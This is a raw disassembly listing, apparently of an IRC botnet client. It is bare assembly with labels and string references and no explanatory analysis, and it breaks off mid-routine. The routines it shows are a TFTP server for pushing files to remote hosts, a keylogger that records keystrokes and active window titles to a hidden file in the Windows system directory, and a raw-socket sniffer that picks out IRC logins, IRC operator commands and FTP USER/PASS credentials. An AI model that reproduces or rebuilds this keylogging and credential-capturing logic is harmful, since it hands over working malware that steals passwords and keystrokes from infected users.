var_D0 = byte ptr -0D0h
var_CF = byte ptr -0CFh
var_CE = byte ptr -0CEh
var_CD = byte ptr -0CDh
Dest = byte ptr -50h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
Dst = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
File = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 87Ch
mov edx, [ebp+arg_0]
push ebx
push esi
push edi
push 1
xor ebx, ebx
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_374]
push ebx
push 2
rep movsd
inc [ebp+var_164]
push 2
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_8], eax
mov [edx+2A0h], eax
call dword_4E3178 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4122B7
push 190h
call ds:dword_4F534C ; Sleep
cmp [ebp+var_D8], ebx
jnz short loc_412297
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409D34
add esp, 14h
loc_412297: ; CODE XREF: sub_412217+5B�j
lea eax, [ebp+var_778]
push eax
call sub_415C3F
push [ebp+var_168]
call sub_40BA72
pop ecx
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_4122B7: ; CODE XREF: sub_412217+48�j
lea eax, [ebp+var_10]
push 4
push eax
mov edi, 0FFFFh
push 4
push edi
push esi
call dword_4E30D8 ; setsockopt
lea eax, [ebp+var_14]
push 4
push eax
push 0FFFFFFFBh
push edi
push esi
call dword_4E30D8 ; setsockopt
mov eax, [ebp+var_168]
push 10h ; Size
imul eax, 234h
push ebx ; Val
mov dword_456024[eax], esi
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_160]
call dword_4E30F8 ; htons
mov [ebp+var_2A], ax
lea eax, [ebp+Dst]
push 10h
push eax
push esi
mov [ebp+var_28], ebx
call dword_4E3124 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_412341
push 1388h
call ds:dword_4F534C ; Sleep
dec [ebp+var_164]
push [ebp+arg_0]
jmp loc_412688
; ---------------------------------------------------------------------------
loc_412341: ; CODE XREF: sub_412217+10F�j
lea eax, [ebp+Filename]
push offset aRb_0 ; "rb"
push eax ; Filename
call _fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+File], eax
jnz short loc_4123A7
push 190h
call ds:dword_4F534C ; Sleep
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409D34
lea eax, [ebp+var_778]
push eax
call sub_415C3F
push [ebp+var_168]
call sub_40BA72
add esp, 1Ch
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_4123A7: ; CODE XREF: sub_412217+142�j
; sub_412217+42B�j
mov edi, [ebp+arg_0]
cmp [edi+2A0h], ebx
jz loc_41264B
mov edi, 80h
lea eax, [ebp+var_D0]
push edi ; Size
push ebx ; Val
push eax ; Dst
mov [ebp+var_1C], 5
mov [ebp+var_18], 1388h
mov [ebp+var_878], esi
mov [ebp+var_87C], 1
call _memset
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_87C]
push ebx
push eax
push ebx
call dword_4E30E0 ; select
test eax, eax
jle loc_41263F
mov al, byte_4E5EA4
mov ecx, edi
mov [ebp+var_578], al
xor eax, eax
lea edi, [ebp+var_577]
mov [ebp+var_C], 10h
rep stosd
stosw
stosb
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_3C]
push eax
push ebx
lea eax, [ebp+var_D0]
push 80h
push eax
push esi
call dword_4E30D0 ; recvfrom
push [ebp+var_38]
mov [ebp+var_8], eax
call dword_4E3184 ; inet_ntoa
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+var_D0], bl
pop ecx
pop ecx
jnz loc_412629
cmp [ebp+var_CF], 1
jnz loc_41252F
lea eax, [ebp+Str]
push eax ; Str
call _strlen
push ebx ; Origin
push ebx ; Offset
push [ebp+File] ; File
call _fseek
push [ebp+File] ; File
lea eax, [ebp+DstBuf]
mov [ebp+var_578], bl
mov [ebp+var_577], 3
push 200h ; Count
push 1 ; ElementSize
push eax ; DstBuf
mov [ebp+var_576], bl
mov [ebp+var_575], 1
call sub_41E3E0
add esp, 20h
lea ecx, [ebp+var_3C]
mov [ebp+var_8], eax
add eax, 4
push [ebp+var_C]
push ecx
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call dword_4E315C ; sendto
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_778]
push offset aTftpTransferSt ; "Tftp transfer started to: %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_D8], ebx
jnz short loc_41251D
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409D34
add esp, 14h
loc_41251D: ; CODE XREF: sub_412217+2E1�j
lea eax, [ebp+var_778]
push eax
call sub_415C3F
pop ecx
jmp loc_41263F
; ---------------------------------------------------------------------------
loc_41252F: ; CODE XREF: sub_412217+257�j
cmp [ebp+var_CF], 4
jnz loc_412629
mov cl, [ebp+var_CD]
mov al, [ebp+var_CE]
cmp cl, 0FFh
mov [ebp+var_578], bl
mov [ebp+var_577], 3
jnz short loc_41256C
inc al
xor cl, cl
mov [ebp+var_576], al
mov [ebp+var_575], bl
jmp short loc_41257A
; ---------------------------------------------------------------------------
loc_41256C: ; CODE XREF: sub_412217+341�j
inc cl
mov [ebp+var_576], al
mov [ebp+var_575], cl
loc_41257A: ; CODE XREF: sub_412217+353�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
mov edi, 200h
shl eax, 9
sub eax, edi
push ebx ; Origin
push eax ; Offset
push [ebp+File] ; File
call _fseek
push [ebp+File] ; File
lea eax, [ebp+DstBuf]
push edi ; Count
push 1 ; ElementSize
push eax ; DstBuf
call sub_41E3E0
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_3C]
mov [ebp+var_8], edi
push [ebp+var_C]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call dword_4E315C ; sendto
cmp edi, ebx
jnz short loc_41263F
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_778]
push offset aTftpTransferCo ; "Tftp transfer complete to: %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_D8], ebx
jnz short loc_412614
push ebx ; int
lea eax, [ebp+var_778]
push [ebp+var_DC] ; int
push eax ; int
lea eax, [ebp+var_15C]
push eax ; Str
push [ebp+var_374] ; int
call sub_409D34
add esp, 14h
loc_412614: ; CODE XREF: sub_412217+3D8�j
lea eax, [ebp+var_778]
push eax
call sub_415C3F
inc dword_4E5C14
pop ecx
jmp short loc_41263F
; ---------------------------------------------------------------------------
loc_412629: ; CODE XREF: sub_412217+24A�j
; sub_412217+31F�j
push [ebp+var_C]
lea eax, [ebp+var_3C]
push eax
push ebx
push 9
push offset dword_44B770
push esi
call dword_4E315C ; sendto
loc_41263F: ; CODE XREF: sub_412217+1E9�j
; sub_412217+313�j ...
cmp [ebp+var_8], ebx
jg loc_4123A7
mov edi, [ebp+arg_0]
loc_41264B: ; CODE XREF: sub_412217+199�j
push esi
call dword_4E3190 ; closesocket
push [ebp+File] ; File
call _fclose
dec [ebp+var_164]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_41267C
push [ebp+var_168]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_41267C: ; CODE XREF: sub_412217+450�j
push 3E8h
call ds:dword_4F534C ; Sleep
push edi
loc_412688: ; CODE XREF: sub_412217+125�j
call sub_412217
pop edi
pop esi
pop ebx
leave
retn 4
sub_412217 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_412694(int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_412694 proc near ; CODE XREF: sub_412775+B4�p
; sub_412775+253�p
Dest = byte ptr -314h
Filename = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Str = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_4F5404 ; GetLocalTime
lea eax, [ebp+Filename]
push 104h
push eax
call ds:dword_4F5348 ; GetSystemDirectoryA
lea eax, [ebp+Filename]
push offset asc_44BEEC ; "\\"
push eax ; Dest
call _strcat
lea eax, [ebp+Filename]
push offset aWinnt_bat ; "winnt.bat"
push eax ; Dest
call _strcat
lea eax, [ebp+Filename]
push offset aAb ; "ab"
push eax ; Filename
call _fopen
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_4126FB
push 1
pop eax
jmp short loc_412772
; ---------------------------------------------------------------------------
loc_4126FB: ; CODE XREF: sub_412694+60�j
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi ; File
call _fprintf
push esi ; File
call _fclose
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_412770
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset asc_44BF10 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 24h
loc_412770: ; CODE XREF: sub_412694+A3�j
xor eax, eax
loc_412772: ; CODE XREF: sub_412694+65�j
pop esi
leave
retn
sub_412694 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412775 proc near ; DATA XREF: sub_401CC7+4500�o
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
Dest = byte ptr -4DCh
var_2DD = byte ptr -2DDh
Dst = byte ptr -2DCh
var_DC = byte ptr -0DCh
var_D8 = dword ptr -0D8h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8DCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_8DC], 0
push 25h
and [ebp+var_4], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_DC]
rep movsd
mov dword ptr [eax+90h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8D8]
rep stosd
call dword_4E307C ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_4E3094 ; GetWindowTextA
mov ebx, 200h
loc_4127D0: ; CODE XREF: sub_412775+2C7�j
push 8
call ds:dword_4F534C ; Sleep
call dword_4E307C ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz short loc_412858
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call dword_4E3094 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+Dst]
push eax ; int
lea eax, [ebp+Dest]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax ; int
call _sprintf
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+Dest]
push 25h
pop ecx
mov edi, esp
push eax ; int
rep movsd
call sub_412694
mov [ebp+var_4], eax
push ebx ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0A4h
lea eax, [ebp+Dest]
push ebx ; Size
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_412858: ; CODE XREF: sub_412775+6C�j
mov [ebp+arg_0], offset dword_44B784
loc_41285F: ; CODE XREF: sub_412775+2BD�j
push 10h
call dword_4E2FCC ; GetKeyState
movsx esi, ax
mov eax, [ebp+arg_0]
mov edi, [eax-4]
push edi
call dword_4E30C4 ; GetAsyncKeyState
test ah, 80h
jz short loc_4128F7
push 14h
call dword_4E2FCC ; GetKeyState
test ax, ax
jz short loc_4128A8
cmp esi, 0FFFFFFFFh
jle short loc_4128A8
cmp edi, 40h
jle short loc_4128A8
cmp edi, 5Bh
jge short loc_4128A8
mov [ebp+edi*4+var_8DC], 1
jmp loc_412A27
; ---------------------------------------------------------------------------
loc_4128A8: ; CODE XREF: sub_412775+112�j
; sub_412775+117�j ...
push 14h
call dword_4E2FCC ; GetKeyState
test ax, ax
jz short loc_4128D3
test esi, esi
jge short loc_4128E7
cmp edi, 40h
jle short loc_4128D3
cmp edi, 5Bh
jge short loc_4128D3
mov [ebp+edi*4+var_8DC], 2
jmp loc_412A27
; ---------------------------------------------------------------------------
loc_4128D3: ; CODE XREF: sub_412775+13E�j
; sub_412775+147�j ...
test esi, esi
jge short loc_4128E7
mov [ebp+edi*4+var_8DC], 3
jmp loc_412A27
; ---------------------------------------------------------------------------
loc_4128E7: ; CODE XREF: sub_412775+142�j
; sub_412775+160�j
mov [ebp+edi*4+var_8DC], 4
jmp loc_412A27
; ---------------------------------------------------------------------------
loc_4128F7: ; CODE XREF: sub_412775+105�j
mov esi, [ebp+edi*4+var_8DC]
lea eax, [ebp+edi*4+var_8DC]
test esi, esi
jz loc_412A27
and dword ptr [eax], 0
lea eax, [ebp+Dst]
cmp edi, 8
push eax ; Str
jnz short loc_41292F
call _strlen
and [ebp+eax+var_2DD], 0
pop ecx
jmp loc_412A27
; ---------------------------------------------------------------------------
loc_41292F: ; CODE XREF: sub_412775+1A5�j
call _strlen
cmp eax, 1B9h
pop ecx
jbe short loc_412961
call dword_4E307C ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_4E3094 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+Dst]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_4129A2
; ---------------------------------------------------------------------------
loc_412961: ; CODE XREF: sub_412775+1C5�j
cmp edi, 0Dh
jnz loc_4129F9
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
test eax, eax
pop ecx
jz loc_412A27
call dword_4E307C ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call dword_4E3094 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+Dst]
push eax ; int
push offset aSReturnS ; "%s (Return) (%s)"
loc_4129A2: ; CODE XREF: sub_412775+1EA�j
lea eax, [ebp+Dest]
push eax ; int
call _sprintf
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+Dest]
push 25h
pop ecx
mov edi, esp
push eax ; int
rep movsd
call sub_412694
mov [ebp+var_4], eax
push ebx ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0A4h
lea eax, [ebp+Dest]
push ebx ; Size
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
jmp short loc_412A27
; ---------------------------------------------------------------------------
loc_4129F9: ; CODE XREF: sub_412775+1EF�j
cmp esi, 1
jz short loc_412A12
cmp esi, 3
jz short loc_412A12
cmp esi, 2
jz short loc_412A0D
cmp esi, 4
jnz short loc_412A27
loc_412A0D: ; CODE XREF: sub_412775+291�j
push [ebp+arg_0]
jmp short loc_412A19
; ---------------------------------------------------------------------------
loc_412A12: ; CODE XREF: sub_412775+287�j
; sub_412775+28C�j
mov eax, [ebp+arg_0]
add eax, 7
push eax ; Source
loc_412A19: ; CODE XREF: sub_412775+29B�j
lea eax, [ebp+Dst]
push eax ; Dest
call _strcat
pop ecx
pop ecx
loc_412A27: ; CODE XREF: sub_412775+12E�j
; sub_412775+159�j ...
add [ebp+arg_0], 14h
cmp [ebp+arg_0], offset dword_44BEB4
jl loc_41285F
cmp [ebp+var_4], 0
jz loc_4127D0
push [ebp+var_D8]
call sub_40BA72
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
sub_412775 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A56 proc near ; DATA XREF: sub_401CC7+4124�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
Str = byte ptr -1028Ch
Dest = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call __alloca_probe
mov edx, [ebp+arg_0]
push esi
push edi
push 1
pop eax
mov esi, edx
push 25h
lea edi, [ebp+var_B4]
pop ecx
mov [ebp+var_8], eax
rep movsd
mov [edx+90h], eax
xor esi, esi
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push esi
call dword_4E30F8 ; htons
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40AF71
pop ecx
push eax
call dword_4E3138 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call dword_4E3178 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_412B2B
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44C7EC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412B0E
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409D34
add esp, 14h
loc_412B0E: ; CODE XREF: sub_412A56+96�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
push [ebp+var_30]
call sub_40BA72
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_412B2B: ; CODE XREF: sub_412A56+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov dword_456024[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4E3124 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_412BB0
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44C818 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412B8C
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409D34
add esp, 14h
loc_412B8C: ; CODE XREF: sub_412A56+114�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
push edi
call dword_4E3190 ; closesocket
push [ebp+var_30]
call sub_40BA72
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_412BB0: ; CODE XREF: sub_412A56+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call dword_4E30A4 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_412C33
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44C844 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_412C0F
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409D34
add esp, 14h
loc_412C0F: ; CODE XREF: sub_412A56+197�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
push edi
call dword_4E3190 ; closesocket
push [ebp+var_30]
call sub_40BA72
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
loc_412C33: ; CODE XREF: sub_412A56+177�j
push ebx
mov ebx, offset a_login ; ":.login"
loc_412C39: ; CODE XREF: sub_412A56+21B�j
; sub_412A56+22D�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_102B4]
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push edi
push eax
push [ebp+var_4]
call dword_4E3110 ; recv
cmp eax, 0FFFFFFFFh
jz loc_412D66
cmp [ebp+var_102AB], 6
jnz short loc_412C39
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_412C39
lea eax, [ebp+Str]
push offset aPsniff_0 ; "[PSNIFF]"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412C39
lea eax, [ebp+Str]
push offset asc_44C8AC ; "-"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412C39
mov eax, ebx
xor edi, edi
test eax, eax
jz loc_412C39
mov [ebp+arg_0], ebx
loc_412CC2: ; CODE XREF: sub_412A56+287�j
push eax ; SubStr
lea eax, [ebp+Str]
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412CE4
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_412CC2
jmp loc_412C39
; ---------------------------------------------------------------------------
loc_412CE4: ; CODE XREF: sub_412A56+27D�j
lea eax, [ebp+Str]
push eax
push [ebp+var_102A0]
call dword_4E3028 ; htons
movzx eax, ax
push eax
push [ebp+var_C]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, dword_44BF94[eax*8]
push off_44BF70[eax*4]
lea eax, [ebp+Dest]
push offset asc_44C8BC ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_412D54
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409D34
add esp, 14h
loc_412D54: ; CODE XREF: sub_412A56+2DC�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
jmp loc_412C39
; ---------------------------------------------------------------------------
loc_412D66: ; CODE XREF: sub_412A56+20E�j
call dword_4E308C ; WSAGetLastError
push eax
push offset asc_44C874 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_412DAC
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_B0]
push eax ; Str
push [ebp+var_B4] ; int
call sub_409D34
add esp, 14h
loc_412DAC: ; CODE XREF: sub_412A56+334�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
pop ecx
push [ebp+var_4]
call dword_4E3190 ; closesocket
push [ebp+var_30]
call sub_40BA72
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
sub_412A56 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412DD2 proc near ; CODE XREF: sub_4130E1+213�p
; sub_4130E1+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4E5EA8, eax
mov eax, offset dword_4E5EA8
retn
sub_412DD2 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_412DE1(char *Str)
sub_412DE1 proc near ; CODE XREF: sub_4130E1+2BF�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aBotSniff ; "Bot sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412DFB
loc_412DF7: ; CODE XREF: sub_412DE1+29�j
; sub_412DE1+3A�j ...
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412DFB: ; CODE XREF: sub_412DE1+14�j
push offset a0 ; "#0#"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412DF7
push offset aPsniff_1 ; "[PSNIFF]:"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412DF7
push offset aPsniff_2 ; "PSNIFF//"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412DF7
push offset aJoin_1 ; "JOIN #"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412E43
loc_412E3F: ; CODE XREF: sub_412DE1+71�j
; sub_412DE1+82�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412E43: ; CODE XREF: sub_412DE1+5C�j
push offset a302 ; "302 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E3F
push offset a366 ; "366 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E3F
push offset a_login_0 ; ":.login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E3F
push offset aLogin_0 ; ":!login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E3F
push offset aLogin_1 ; ":!Login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E3F
push offset a_login_1 ; ":.Login"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E3F
push offset a_ident ; ":.ident"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412E3F
push offset aIdent_0 ; ":!ident"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz loc_412E3F
push offset a_hashin ; ":.hashin"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz loc_412E3F
push offset aHashin ; ":!hashin"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412DE1 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_412EF8(char *Str)
sub_412EF8 proc near ; CODE XREF: sub_4130E1+2F8�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aIrcSniff ; "IRC sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412F12
loc_412F0E: ; CODE XREF: sub_412EF8+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412F12: ; CODE XREF: sub_412EF8+14�j
push offset a0 ; "#0#"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F0E
push offset aOper ; "OPER "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412F38
loc_412F34: ; CODE XREF: sub_412EF8+4F�j
; sub_412EF8+60�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412F38: ; CODE XREF: sub_412EF8+3A�j
push offset aNick_2 ; "NICK "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F34
push offset aOper_0 ; "oper "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F34
push offset aYouAreNowAnIrc ; "You are now an IRC Operator"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412EF8 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_412F6E(char *Str)
sub_412F6E proc near ; CODE XREF: sub_4130E1+32E�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aFtpSniff ; "FTP sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412F88
loc_412F84: ; CODE XREF: sub_412F6E+29�j
; sub_412F6E+3A�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412F88: ; CODE XREF: sub_412F6E+14�j
push offset a0 ; "#0#"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F84
push offset aNick_3 ; "NICK "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412F84
push offset a220 ; "220 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_412FBF
loc_412FBB: ; CODE XREF: sub_412F6E+60�j
; sub_412F6E+71�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_412FBF: ; CODE XREF: sub_412F6E+4B�j
push offset a230 ; "230 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412FBB
push offset aUser_2 ; "USER "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412FBB
push offset aPass_0 ; "PASS "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412F6E endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_412FF5(char *Str)
sub_412FF5 proc near ; CODE XREF: sub_4130E1+35F�p
Str = dword ptr 4
push esi
